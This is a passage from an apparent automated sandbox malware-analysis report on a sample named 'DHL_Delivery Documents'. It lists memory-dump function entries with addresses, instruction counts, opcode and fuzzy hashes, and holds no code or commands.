                        • Instruction Fuzzy Hash: 9031BC35740716EBD722AFA58C85FEB77A5EB59F50F000024F600EB391DA68DD40DBA0
                        Function 01CC4B4B Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c1512b873b13be8ff407773928298a3a635482879267544b96d38d85041ba7dd
                        • Instruction ID: 0b948de89dceac04666f2d939af0d93396c746fbccdfee4384f445748a2c27dc
                        • Opcode Fuzzy Hash: c1512b873b13be8ff407773928298a3a635482879267544b96d38d85041ba7dd
                        • Instruction Fuzzy Hash: 1931BD32605211CFC329DF1DD8A0A26BBE5FB84660F09846DE9958B761D730ED60CB90
                        Function 01C14260 Relevance: .1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6717b06e74c5cf64b1f7288b5342e0d8b78c6d178451fee760fbd02b3c6b0a36
                        • Instruction ID: 20db58dcd314061a8a1592dba113d99bfcb04ea96dfdbb33ea0b19359bd20da6
                        • Opcode Fuzzy Hash: 6717b06e74c5cf64b1f7288b5342e0d8b78c6d178451fee760fbd02b3c6b0a36
                        • Instruction Fuzzy Hash: 7141D132240B45DFC726CF29C884FDA7BE5FF4A750F104429E6598B260D774E950DB50
                        Function 01CC4BB0 Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b599ea647dcbb8ec2b6ebe678c01f255fa3cd1126c70649f957f7402db589c1a
                        • Instruction ID: d1abb6ee704bcd0695b78ac07d1443c299cf0e851b3828a4e697241b90214763
                        • Opcode Fuzzy Hash: b599ea647dcbb8ec2b6ebe678c01f255fa3cd1126c70649f957f7402db589c1a
                        • Instruction Fuzzy Hash: C2317A71604202CFD328DF29C8A0B6AB7E5FB84B20F05896DE9559B7A5E730ED14CB91
                        Function 01C8EB1D Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34f2316f68b6c379a043ac16c73ab03c753fcfb1ef1beb4feed8b8c8faf8fd72
                        • Instruction ID: a3c06a85151935aa0e0904300c720acdf64f9bbbd152dd432efa9754ec187cb8
                        • Opcode Fuzzy Hash: 34f2316f68b6c379a043ac16c73ab03c753fcfb1ef1beb4feed8b8c8faf8fd72
                        • Instruction Fuzzy Hash: 4F31C1316016D2DBF322775DCD88B657BD8BB45B48F1D00A0AB459BAE2DB28D940C229
                        Function 01CD61C3 Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b21a3804586f6db88252c4fca67acf8bddda0ac8ace456ba8e7f449a6c6c7f1d
                        • Instruction ID: 7247d01a25c2e9ebf472836c1599105f4ae62655609b1750b75cb94848f345a6
                        • Opcode Fuzzy Hash: b21a3804586f6db88252c4fca67acf8bddda0ac8ace456ba8e7f449a6c6c7f1d
                        • Instruction Fuzzy Hash: 0F31B375A0026AEBDB15DF98CC40FAEB7B5FB48B40F554169EA00EB244D770ED41CBA4
                        Function 01CB483A Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a1a3983bb10c2bf4d6f796aaae9cc795d23d15bbd78420c99542b01af9bdc408
                        • Instruction ID: 93567390b3816c6bb040ae0e8d5f291e302d823951177a822188dd8fd65d8956
                        • Opcode Fuzzy Hash: a1a3983bb10c2bf4d6f796aaae9cc795d23d15bbd78420c99542b01af9bdc408
                        • Instruction Fuzzy Hash: 80316236E4016DEBCF25DF54DC84BDE7BB9AB98310F1000A5A509E7251CA30DE91DF90
                        Function 01C3EB20 Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e3b13d2e537173e7c99569574e5ff6fb3288d44b561b5e1d3ae5e76f6084ee34
                        • Instruction ID: 0691c872096da0af5b26abc07db28e2e22f3b74f6b385eed51d4ab01f725d343
                        • Opcode Fuzzy Hash: e3b13d2e537173e7c99569574e5ff6fb3288d44b561b5e1d3ae5e76f6084ee34
                        • Instruction Fuzzy Hash: D231A172E00215EFDB22DEA9C840AAEBBB8EF58750F014465E926E7650D270DA00DBA5
                        Function 01CD60B8 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06592e05ee0b9ad067b2882367c056436601348b6a0b479d5b48734cab953093
                        • Instruction ID: 3bef563497604b385168220d773c292f9c52cadb6ee264db40f85ed10661ed5b
                        • Opcode Fuzzy Hash: 06592e05ee0b9ad067b2882367c056436601348b6a0b479d5b48734cab953093
                        • Instruction Fuzzy Hash: D431D471A40626EFDB129FA9C850B6EB7B9AF44754F004069E606EB351DB30ED01DB90
                        Function 01C107AF Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3fa426cdc16bbf3aa56dc50721de59497429c180ae7c5d09a2493791d8392318
                        • Instruction ID: 50b9ff60f380da8f81d65e24867cc14ae087fefd232d31c7567e2b976fad57be
                        • Opcode Fuzzy Hash: 3fa426cdc16bbf3aa56dc50721de59497429c180ae7c5d09a2493791d8392318
                        • Instruction Fuzzy Hash: EC312932A48312DBD712DE28C880E6B7BA5AFD5250F014529FD5597308DA30DC61E7E1
                        Function 01C18550 Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ca09568d926d943a120901d41ddd404a458549b41f6f83aefd2ac322ebb1dc4e
                        • Instruction ID: 7459fd5dc7db5681cdc8ecfcaeff1c642097b840445427ce37eb2b6a1780871d
                        • Opcode Fuzzy Hash: ca09568d926d943a120901d41ddd404a458549b41f6f83aefd2ac322ebb1dc4e
                        • Instruction Fuzzy Hash: 7831AD71609301CFE321CF19C840B2ABBE5FB98B00F05496DF98497395D7B4E944CBA1
                        Function 01C4A6C7 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                        • Instruction ID: 130aeaa8b4942e9937aa2a465c33de1423b2409ca390d86725468a7c3edf2185
                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                        • Instruction Fuzzy Hash: 92312CB2B04B11EFE775DF6ACD40B57BBF8AB08650F04452DA59BC3651E630E900CB64
                        Function 01CBEBD0 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6dae4d2c5afb22187ad85f06c0fb58eb8f1a3a1f203efb5b7c9bf98237752c8
                        • Instruction ID: a3c9a1a4ed21829e5156a93cf5ed8a696c32e03f84f2d117fb2a5c0c32f3c8a0
                        • Opcode Fuzzy Hash: c6dae4d2c5afb22187ad85f06c0fb58eb8f1a3a1f203efb5b7c9bf98237752c8
                        • Instruction Fuzzy Hash: A7318D71505341DFCB12DF1DC58099ABBF1FF89A14F0489AEE4889B351E331DA45DB92
                        Function 01C3438F Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ba95c01fcd92c7648675dd2a9f1648ea7e683b388c1d2c53f7e596a105f2ab2
                        • Instruction ID: 26250d102bf3efb4eafe4fd8521dab4d04d59fb5227f553fc7e43c46c54cb4c0
                        • Opcode Fuzzy Hash: 6ba95c01fcd92c7648675dd2a9f1648ea7e683b388c1d2c53f7e596a105f2ab2
                        • Instruction Fuzzy Hash: BB31BF32B00206DFD728EFA9C984B6ABBF9AB84704F008539D645D7294D734EE81CB90
                        Function 01C0CB7E Relevance: .1, Instructions: 89COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                        • Instruction ID: 7ec256572d1a2a69a5ca8685cc9a013c8863784e8d187283590b37ef507e0649
                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                        • Instruction Fuzzy Hash: 4C210432E4025BEADB119BB9C840BAFBBB9AF55B40F0581759E15F7380E270CA0087A4
                        Function 01C0C156 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8132888daca6638b6a752bd48f15ab1ecc350d67a650e571dbb2c6d81c955aa1
                        • Instruction ID: 3f1c097c5ea577629eade8abd3dc7c9c5ff68378fdf08351ecc08686b211ee0b
                        • Opcode Fuzzy Hash: 8132888daca6638b6a752bd48f15ab1ecc350d67a650e571dbb2c6d81c955aa1
                        • Instruction Fuzzy Hash: E1315971600211CBD731AF68CC80B7977B8FF51314F8481A9D9879B386DA78DA82DB90
                        Function 01CCC3CD Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                        • Instruction ID: 8d71eeef1db6fe36dfe9a8d32e830125d8e62c9ee7818bafbf8fbd71810aa9a8
                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                        • Instruction Fuzzy Hash: 6F21FB36600E52E7CB15EB958810ABAFBB5EF50B10F40C41EFA9987A91E638DD50D364
                        Function 01C0E420 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 19906d2dadfecc0bf0afa8d58d9df768186c058bd103380498419ee9f86b1c3f
                        • Instruction ID: 9e1fcdcd36e5d4b3c27af364790b34be05b7ab5106bb81d103fc0f8176cda75f
                        • Opcode Fuzzy Hash: 19906d2dadfecc0bf0afa8d58d9df768186c058bd103380498419ee9f86b1c3f
                        • Instruction Fuzzy Hash: D931C232A8012CDBDB369F58CC41BEEB7B9EB15750F0109A1E645A72D0D674EE809FA0
                        Function 01C44588 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                        • Instruction ID: 89ad0d1a5de10b1ab2c275820383c415abd2e9f2aebddbb7e053560a588e02a8
                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                        • Instruction Fuzzy Hash: A8217F32A05609EFCB19CF58D980ADEBBB5FF48724F208069EE159B241D671EE45CB90
                        Function 01C444B0 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02dad02f975c2a8c4fb68af55b80af99278a1a63af1aeeb68caf2cae415c4196
                        • Instruction ID: 5a23165e6f7f55941a51bd09031de58bda4272c7a6ff563820afb8d56828b1c3
                        • Opcode Fuzzy Hash: 02dad02f975c2a8c4fb68af55b80af99278a1a63af1aeeb68caf2cae415c4196
                        • Instruction Fuzzy Hash: 9F21C172A08745DBCB26DF59C880B6B77E4FB8C760F114519FD589B641D730EA018BE2
                        Function 01C0E388 Relevance: .1, Instructions: 86COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                        • Instruction ID: 063abce11f44a8c1a8aefe91451e04cbaa62969407fa67da5960e750c4d80cfc
                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                        • Instruction Fuzzy Hash: 84319A31600644EFD722CFA9C884F6AB7F9EF85354F1049A9E5528B281E730EE41CB50
                        Function 01C8E609 Relevance: .1, Instructions: 86COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c2f02ada5b95a6e3d3677cdc13cabf6f8b8569a01c28e51430f94a633add4b8
                        • Instruction ID: c1fd3592d226a29c517758ef7c3d056376ddb7fe0f988700961a5f1fece52a82
                        • Opcode Fuzzy Hash: 6c2f02ada5b95a6e3d3677cdc13cabf6f8b8569a01c28e51430f94a633add4b8
                        • Instruction Fuzzy Hash: 88318E75A0020AEFCB15EF1CC884AAEB7B5FF84318B158459E8099B391E771EA50CB94
                        Function 01C906F1 Relevance: .1, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7be4bc271f1bf77c09ddaa509a0e9261e277b938ba05005a903a011172de789
                        • Instruction ID: 452950e047ee9def04fd85e44ddda7885c425f273573b24800ae5b14dcdd1c15
                        • Opcode Fuzzy Hash: c7be4bc271f1bf77c09ddaa509a0e9261e277b938ba05005a903a011172de789
                        • Instruction Fuzzy Hash: 48217E75900229DBCF25DF59C881ABEB7F8FF48750B500069F941A7250D738ED51DBA1
                        Function 01C9019F Relevance: .1, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd6b4d4d490f0315303ece0b1d72468f295a551bbc6c6e380fd37e8080fec372
                        • Instruction ID: d074f45a9a88677fd02a8f8735e3f768c93c692e2dac592ad77b64255dfc376c
                        • Opcode Fuzzy Hash: cd6b4d4d490f0315303ece0b1d72468f295a551bbc6c6e380fd37e8080fec372
                        • Instruction Fuzzy Hash: 0821BC71600655EFDB15DBADC844F6AB7B8FF48740F140069F904D7691D638ED50CB68
                        Function 01C90283 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b440527cee80a67c7f857fbf3982b84a5a6bf5ecbf14ccf3bc2ef6191de46549
                        • Instruction ID: 6655510b0719687ab68915cef116637f65604cd0679e25f2c1fb69eaa0204dda
                        • Opcode Fuzzy Hash: b440527cee80a67c7f857fbf3982b84a5a6bf5ecbf14ccf3bc2ef6191de46549
                        • Instruction Fuzzy Hash: 8921D072904786DBDB11EF5AC848B6BBBECBF91640F080496BE84C7261D734CA14D6A2
                        Function 01C32835 Relevance: .1, Instructions: 73COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8388099b8b277266ce3bf5ddd65f6588063994074663e7da28a0a63d128488d4
                        • Instruction ID: e22dd362e56b00b52e48ac1e56cce084ca207b4505366d2527f22b27200c1724
                        • Opcode Fuzzy Hash: 8388099b8b277266ce3bf5ddd65f6588063994074663e7da28a0a63d128488d4
                        • Instruction Fuzzy Hash: C62108326456C1DBEB22576D8C04B283B94AF85774F2C0364FA609B6E2DBACC9418247
                        Function 01C4A30B Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68d50a2455f657b9bc14e4ce73946e830224b59f27bd6ca9596ed1e3d89d01a3
                        • Instruction ID: 8ba349f1ac4c9349f834b52f25fb8d33363b75277e646742af296bb00abacab6
                        • Opcode Fuzzy Hash: 68d50a2455f657b9bc14e4ce73946e830224b59f27bd6ca9596ed1e3d89d01a3
                        • Instruction Fuzzy Hash: 0E21A935240A51EFCB25DF29C840B56B7F5BF48B48F248468E50ACBB62E375E942CB94
                        Function 01CCA49A Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0b715a843db5c975fe3fc7213e913c5a07f81c49c114684a4edbec31aff25c1d
                        • Instruction ID: 6a84c43188c86a7912a4e2e4e1169d9ee6a0d23f12964d4baec70d8475a8cf5a
                        • Opcode Fuzzy Hash: 0b715a843db5c975fe3fc7213e913c5a07f81c49c114684a4edbec31aff25c1d
                        • Instruction Fuzzy Hash: D011E372280E19FFE32256599C09F6BB6D99BE4F60F11402CF708CB280FB60DC019795
                        Function 01C90946 Relevance: .1, Instructions: 70COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79a61f10707deebe94ba4db6bd4ed102465ebd1f16124f664a4f77152c80699a
                        • Instruction ID: 40d5b6fc339c5db657a4bbdf209f93f4218a186419112c593eea7bd2cec4db8b
                        • Opcode Fuzzy Hash: 79a61f10707deebe94ba4db6bd4ed102465ebd1f16124f664a4f77152c80699a
                        • Instruction Fuzzy Hash: 5521E3B1E00349EBCB25DFAAD885AAEFBF8FF98610F10012EE505A7340D6709945CB64
                        Function 01CA80A8 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                        • Instruction ID: d22195d1d6a96e748d26e3c185a8811c8076fa6f94308934757fb49eb2a725ac
                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                        • Instruction Fuzzy Hash: 2B216D72A0020AEFDB129F98CC40BAEBBB9EF48355F604415FA51A7251D734E951DB50
                        Function 01C40124 Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                        • Instruction ID: 672b1c0ff11bc16c6b3b85e80061f518e23855195fa689ac70f18e6721e72d75
                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                        • Instruction Fuzzy Hash: AB11EF72648605EFE7229F98CC44FAABBB8EB80754F100029FB059B180D671EE54DB60
                        Function 01C18770 Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d4e32b0bb6ac476e06f32c395f09851292b13d737a3ce2b639ab83d544abe7d7
                        • Instruction ID: 6286f122615863840dd1b5ae4a6ed5e88547bd99c4d7bf71e5653f1a4a00a76b
                        • Opcode Fuzzy Hash: d4e32b0bb6ac476e06f32c395f09851292b13d737a3ce2b639ab83d544abe7d7
                        • Instruction Fuzzy Hash: B2119D35744611DBDB11CF4EC480A26BBE9AF8B750B188069FE089F208D6B2DA0197E0
                        Function 01C4AAEE Relevance: .1, Instructions: 68COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                        • Instruction ID: 02f0da10a231429efa075be7488bac031cb4bcacb45154729196c1551d82892e
                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                        • Instruction Fuzzy Hash: 8021BB72684641DFD7319F4AC540A66FBE6EB94B28F10883DE94A87B10C730ED00DB80
                        Function 01C180E9 Relevance: .1, Instructions: 66COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c95eaea770e033b281c758d4fd706e100c7cdd15acab29e6bc3894c98cd85f9
                        • Instruction ID: 5c2feaaee1438c6140dd9548e7358350b3b67fa6cbe1200a477b4460e9d8d598
                        • Opcode Fuzzy Hash: 9c95eaea770e033b281c758d4fd706e100c7cdd15acab29e6bc3894c98cd85f9
                        • Instruction Fuzzy Hash: 26217932A44206DFCB14CF98C580AAABBB5FB8A318F30416DD105AB314CB71EE06DB90
                        Function 01C4674D Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
